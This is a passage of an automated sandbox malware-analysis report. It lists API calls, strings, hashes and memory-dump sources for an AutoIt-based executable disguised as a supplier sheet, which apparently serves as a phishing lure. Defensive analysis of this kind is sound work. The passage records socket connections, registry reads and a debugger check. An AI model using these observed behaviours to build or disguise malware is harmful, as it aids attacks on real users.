                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                  • API String ID: 2862541840-625585964
                                                                                                                  • Opcode ID: 205e1fe7d5b76029e97e49409e32450ab4dfed68ada3b817650b966acc08d035
                                                                                                                  • Instruction ID: bea45aa9880b45e315f6f0d0c83e0ba0c11d5193e15d298e275d5b1071644dab
                                                                                                                  • Opcode Fuzzy Hash: 205e1fe7d5b76029e97e49409e32450ab4dfed68ada3b817650b966acc08d035
                                                                                                                  • Instruction Fuzzy Hash: DF91AB71A1031AABDB24CFA5D844FAEBBB8EF45710F14911DFA19AB281D7709941CFB0
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00D8EADA,?,?), ref: 00D8EB27
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00D8EADA,?,?), ref: 00DE4B26
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00D8EADA,?,?), ref: 00DE4B65
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00D8EADA,?,?), ref: 00DE4B94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                  • API String ID: 1586453840-614718249
                                                                                                                  • Opcode ID: c72bceddfd729a2bacf04a0dc7a5896058ecedb1a7545cf06b6c21aa6bd86270
                                                                                                                  • Instruction ID: 4cc177d315795fd69ce53055209758ce081267566a5a254eaead0ad7fa5ca804
                                                                                                                  • Opcode Fuzzy Hash: c72bceddfd729a2bacf04a0dc7a5896058ecedb1a7545cf06b6c21aa6bd86270
                                                                                                                  • Instruction Fuzzy Hash: A3115E71A04208BEEB04EBA4DD86EFEB7BDEF04355F104459F906E6191EA70AE41DB70
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D72ECB
                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D72EEC
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00D72F00
                                                                                                                  • ShowWindow.USER32(00000000), ref: 00D72F09
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CreateShow
                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                  • Opcode ID: e1d69a10fadd66b52713373f53f724dab9283a1fce3ae2dd6f2c95f029540336
                                                                                                                  • Instruction ID: b5715bdaae88e4a1d611898810127b7eb6e6d61e62b7a45183395ecf3f23b7f3
                                                                                                                  • Opcode Fuzzy Hash: e1d69a10fadd66b52713373f53f724dab9283a1fce3ae2dd6f2c95f029540336
                                                                                                                  • Instruction Fuzzy Hash: 6CF01D706442D87ED72057576C4CE773E7ED7C6F20F01405EB904B21A0C2610889DAB0
                                                                                                                  APIs
                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00DC9409
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC9416
                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00DC943A
                                                                                                                  • _strlen.LIBCMT ref: 00DC9484
                                                                                                                  • _memmove.LIBCMT ref: 00DC94CA
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC94F7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2795762555-0
                                                                                                                  • Opcode ID: a3b6805e4ec79db118c91c08e7df2a321faf5aa8c7057d6602c099ecf58d3253
                                                                                                                  • Instruction ID: e26316f1ee93a810838c9b516beaa7f83b1c1928b69642f69aac60f7bf172847
                                                                                                                  • Opcode Fuzzy Hash: a3b6805e4ec79db118c91c08e7df2a321faf5aa8c7057d6602c099ecf58d3253
                                                                                                                  • Instruction Fuzzy Hash: F0415075504209AFCB18EBA4CD99FAEB7B9EF48310F108159F51A97291EB30EE41CB74
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D73B1E: _wcsncpy.LIBCMT ref: 00D73B32
                                                                                                                  • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00DB6DBA
                                                                                                                  • GetLastError.KERNEL32 ref: 00DB6DC5
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DB6DD9
                                                                                                                  • _wcsrchr.LIBCMT ref: 00DB6DFB
                                                                                                                    • Part of subcall function 00DB6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00DB6E31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3633006590-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DCACD3: inet_addr.WS2_32(00000000), ref: 00DCACF5
                                                                                                                  • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 00DC9160
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC916F
                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 00DC918B
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3701255441-0
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: dE
                                                                                                                  • API String ID: 0-1919509572
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D73F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00D734E2,?,00000001), ref: 00D73FCD
                                                                                                                  • _free.LIBCMT ref: 00DE3C27
                                                                                                                  • _free.LIBCMT ref: 00DE3C6E
                                                                                                                    • Part of subcall function 00D7BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00E322E8,?,00000000,?,00D73E2E,?,00000000,?,00E0DBF0,00000000,?), ref: 00D7BE8B
                                                                                                                    • Part of subcall function 00D7BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00D73E2E,?,00000000,?,00E0DBF0,00000000,?,00000002), ref: 00D7BEA7
                                                                                                                    • Part of subcall function 00D7BDF0: __wsplitpath.LIBCMT ref: 00D7BF19
                                                                                                                    • Part of subcall function 00D7BDF0: _wcscpy.LIBCMT ref: 00D7BF31
                                                                                                                    • Part of subcall function 00D7BDF0: _wcscat.LIBCMT ref: 00D7BF46
                                                                                                                    • Part of subcall function 00D7BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00D7BF56
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                  • API String ID: 1510338132-1757145024
                                                                                                                  APIs
                                                                                                                  • __getstream.LIBCMT ref: 00D9418E
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D941C9
                                                                                                                  • __wopenfile.LIBCMT ref: 00D941D9
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                  • String ID: <G
                                                                                                                  • API String ID: 1820251861-2138716496
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00D8C948,SwapMouseButtons,00000004,?), ref: 00D8C979
                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00D8C948,SwapMouseButtons,00000004,?,?,?,?,00D8BF22), ref: 00D8C99A
                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,00D8C948,SwapMouseButtons,00000004,?,?,?,?,00D8BF22), ref: 00D8C9BC
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D741A7: _fseek.LIBCMT ref: 00D741BF
                                                                                                                    • Part of subcall function 00DBCE59: _wcscmp.LIBCMT ref: 00DBCF49
                                                                                                                    • Part of subcall function 00DBCE59: _wcscmp.LIBCMT ref: 00DBCF5C
                                                                                                                  • _free.LIBCMT ref: 00DBCDC9
                                                                                                                  • _free.LIBCMT ref: 00DBCDD0
                                                                                                                  • _free.LIBCMT ref: 00DBCE3B
                                                                                                                    • Part of subcall function 00D928CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00D98715,00000000,00D988A3,00D94673,?), ref: 00D928DE
                                                                                                                    • Part of subcall function 00D928CA: GetLastError.KERNEL32(00000000,?,00D98715,00000000,00D988A3,00D94673,?), ref: 00D928F0
                                                                                                                  • _free.LIBCMT ref: 00DBCE43
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1552873950-0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00D71E87
                                                                                                                    • Part of subcall function 00D738E4: _memset.LIBCMT ref: 00D73965
                                                                                                                    • Part of subcall function 00D738E4: _wcscpy.LIBCMT ref: 00D739B5
                                                                                                                    • Part of subcall function 00D738E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D739C6
                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00D71EDC
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D71EEB
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DE4526
                                                                                                                  Similarity
                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1378193009-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F282
                                                                                                                    • Part of subcall function 00D8F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F2A6
                                                                                                                  • gethostbyname.WS2_32(?), ref: 00DC92F0
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC92FB
                                                                                                                  • _memmove.LIBCMT ref: 00DC9328
                                                                                                                  • inet_ntoa.WS2_32(?), ref: 00DC9333
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1504782959-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D945EC: __FF_MSGBANNER.LIBCMT ref: 00D94603
                                                                                                                    • Part of subcall function 00D945EC: __NMSG_WRITE.LIBCMT ref: 00D9460A
                                                                                                                    • Part of subcall function 00D945EC: RtlAllocateHeap.NTDLL(01790000,00000000,00000001), ref: 00D9462F
                                                                                                                  • std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                    • Part of subcall function 00D97495: RaiseException.KERNEL32(?,?,00D7125D,00E26598,?,?,?,00D90158,00D7125D,00E26598,?,00000001), ref: 00D974E6
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                  • String ID: bad allocation
                                                                                                                  • API String ID: 3902256705-2104205924
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,00D7C00E,?,?,?,?,00000010), ref: 00D7C627
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 00D7C65F
                                                                                                                  • _memmove.LIBCMT ref: 00D7C697
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3033907384-0
                                                                                                                  APIs
                                                                                                                  • SHGetMalloc.SHELL32(00D73C31), ref: 00D73A7D
                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00D73AD2
                                                                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00D73A8F
                                                                                                                    • Part of subcall function 00D73B1E: _wcsncpy.LIBCMT ref: 00D73B32
                                                                                                                  Similarity
                                                                                                                  • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3981382179-0
                                                                                                                  APIs
                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00D94603
                                                                                                                    • Part of subcall function 00D98E52: __NMSG_WRITE.LIBCMT ref: 00D98E79
                                                                                                                    • Part of subcall function 00D98E52: __NMSG_WRITE.LIBCMT ref: 00D98E83
                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 00D9460A
                                                                                                                    • Part of subcall function 00D98EB2: GetModuleFileNameW.KERNEL32(00000000,00E30312,00000104,?,00000001,00D90127), ref: 00D98F44
                                                                                                                    • Part of subcall function 00D98EB2: ___crtMessageBoxW.LIBCMT ref: 00D98FF2
                                                                                                                    • Part of subcall function 00D91D65: ___crtCorExitProcess.LIBCMT ref: 00D91D6B
                                                                                                                    • Part of subcall function 00D91D65: ExitProcess.KERNEL32 ref: 00D91D74
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  • RtlAllocateHeap.NTDLL(01790000,00000000,00000001), ref: 00D9462F
                                                                                                                  Similarity
                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1372826849-0
                                                                                                                  APIs
                                                                                                                  • TranslateMessage.USER32(?), ref: 00D7E646
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00D7E651
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7E664
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4217535847-0
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00DBC45E
                                                                                                                    • Part of subcall function 00D928CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00D98715,00000000,00D988A3,00D94673,?), ref: 00D928DE
                                                                                                                    • Part of subcall function 00D928CA: GetLastError.KERNEL32(00000000,?,00D98715,00000000,00D988A3,00D94673,?), ref: 00D928F0
                                                                                                                  • _free.LIBCMT ref: 00DBC46F
                                                                                                                  • _free.LIBCMT ref: 00DBC481
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: CALL
                                                                                                                  • API String ID: 0-4196123274
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D716F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00D71751
                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D7159B
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00D71612
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DE58F7
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 458326420-0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: EA06
                                                                                                                  • API String ID: 4104443479-3962188686
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscmp
                                                                                                                  • String ID: 0.0.0.0
                                                                                                                  • API String ID: 856254489-3771769585
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DE3CF1
                                                                                                                    • Part of subcall function 00D731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D731DA
                                                                                                                    • Part of subcall function 00D73A67: SHGetMalloc.SHELL32(00D73C31), ref: 00D73A7D
                                                                                                                    • Part of subcall function 00D73A67: SHGetDesktopFolder.SHELL32(?), ref: 00D73A8F
                                                                                                                    • Part of subcall function 00D73A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00D73AD2
                                                                                                                    • Part of subcall function 00D73B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00E322E8,?), ref: 00D73B65
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                  • String ID: X
                                                                                                                  • API String ID: 2727075218-3081909835
                                                                                                                  Strings
                                                                                                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00DE34AA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                  • API String ID: 1029625771-2684727018
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DB6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00DB685E,?,?,?,00DE4A5C,00E0E448,00000003,?,?), ref: 00DB66E2
                                                                                                                  • WriteFile.KERNEL32(?,?,",00000000,00000000,?,?,?,00DE4A5C,00E0E448,00000003,?,?,00D74C44,?,?), ref: 00DB686C
                                                                                                                  Similarity
                                                                                                                  • API ID: File$PointerWrite
                                                                                                                  • String ID: "
                                                                                                                  • API String ID: 539440098-357034475
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 00DC8074
                                                                                                                  • GetForegroundWindow.USER32 ref: 00DC807A
                                                                                                                    • Part of subcall function 00DC6B19: GetWindowRect.USER32(?,?), ref: 00DC6B2C
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CursorForegroundRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1066937146-0
                                                                                                                  APIs
                                                                                                                  • IsWindow.USER32(00000000), ref: 00DEDB31
                                                                                                                  • IsWindow.USER32(00000000), ref: 00DEDB6B
                                                                                                                    • Part of subcall function 00D71F04: GetForegroundWindow.USER32 ref: 00D71FBE
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Foreground
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 62970417-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D71952
                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DAE344
                                                                                                                  • _strlen.LIBCMT ref: 00DAE34F
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Timeout_strlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2777139624-0
                                                                                                                  APIs
                                                                                                                  • 74E4C8D0.UXTHEME ref: 00D736E6
                                                                                                                    • Part of subcall function 00D92025: __lock.LIBCMT ref: 00D9202B
                                                                                                                    • Part of subcall function 00D732DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D732F6
                                                                                                                    • Part of subcall function 00D732DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D7330B
                                                                                                                    • Part of subcall function 00D7374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D7376D
                                                                                                                    • Part of subcall function 00D7374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00D7377F
                                                                                                                    • Part of subcall function 00D7374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00000104,?,00E31120,C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00E31124,?,?), ref: 00D737EE
                                                                                                                    • Part of subcall function 00D7374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00D73860
                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00D73726
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3809921791-0
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00D74C2B,?,?,?,?,00D7BE63), ref: 00D74BB6
                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00D74C2B,?,?,?,?,00D7BE63), ref: 00DE4972
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: a8367c4b079a675e20ec3c7dbae7f60ef34b689bfb33b86bc514d90c8b8cf1fe
                                                                                                                  • Instruction ID: 628acba688173224d09f6538303fbd2290fefb832a5e0482cacdd30ae1db6b51
                                                                                                                  • Opcode Fuzzy Hash: a8367c4b079a675e20ec3c7dbae7f60ef34b689bfb33b86bc514d90c8b8cf1fe
                                                                                                                  • Instruction Fuzzy Hash: 59018070244308BEF3255E248C8AF663ADDEB05768F14C319BAE86A1E0D7B49C44CB20
                                                                                                                  APIs
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F282
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DBAEA5,?,?,00000000,00000008), ref: 00D8F2A6
                                                                                                                    • Part of subcall function 00D8F2D0: _memmove.LIBCMT ref: 00D8F307
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
